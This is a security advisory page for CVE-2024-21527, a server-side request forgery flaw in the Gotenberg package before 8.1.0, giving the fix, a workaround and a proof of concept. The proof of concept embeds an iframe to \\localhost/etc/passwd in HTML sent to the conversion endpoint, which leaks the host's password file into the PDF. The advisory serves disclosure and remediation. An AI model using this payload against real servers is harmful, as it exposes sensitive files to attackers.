Server-side Request Forgery (SSRF) Affecting github.com/gotenberg/gotenberg/v8/pkg/gotenberg package, versions <8.1.0


Severity

Recommended
0.0
high
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of concept
EPSS
0.06% (28th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about Server-side Request Forgery (SSRF) vulnerabilities in an interactive lesson.

Start learning
  • Snyk IDSNYK-GOLANG-GITHUBCOMGOTENBERGGOTENBERGV8PKGGOTENBERG-7537081
  • published18 Jul 2024
  • disclosed22 Feb 2024
  • creditFilip Ochnik

Introduced: 22 Feb 2024

CVE-2024-21527  (opens in a new tab)
CWE-918  (opens in a new tab)
First added by Snyk

How to fix?

Upgrade github.com/gotenberg/gotenberg/v8/pkg/gotenberg to version 8.1.0 or higher.

Overview

Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) via the /convert/html endpoint when a request is made to a file via localhost, such as <iframe src="\\localhost/etc/passwd">. By exploiting this vulnerability, an attacker can achieve local file inclusion, allowing of sensitive files read on the host system.

Workaround

An alternative is using either or both --chromium-deny-list and --chromium-allow-list flags.

PoC

  1. Start Gotenberg:
docker run --rm -p 3000:3000 gotenberg/gotenberg:8.0.3 gotenberg
  1. Create an index.html file with the following contents:
<body>
  <iframe src="\\localhost/etc/passwd">
</body>
  1. Convert index.html to PDF:
curl -v \
--request POST 'http://localhost:3000/forms/chromium/convert/html' \
--form 'files=@"index.html"' -o output.pdf
  1. Open output.pdf, it will include the contents of /etc/passwd.

CVSS Scores

version 4.0
version 3.1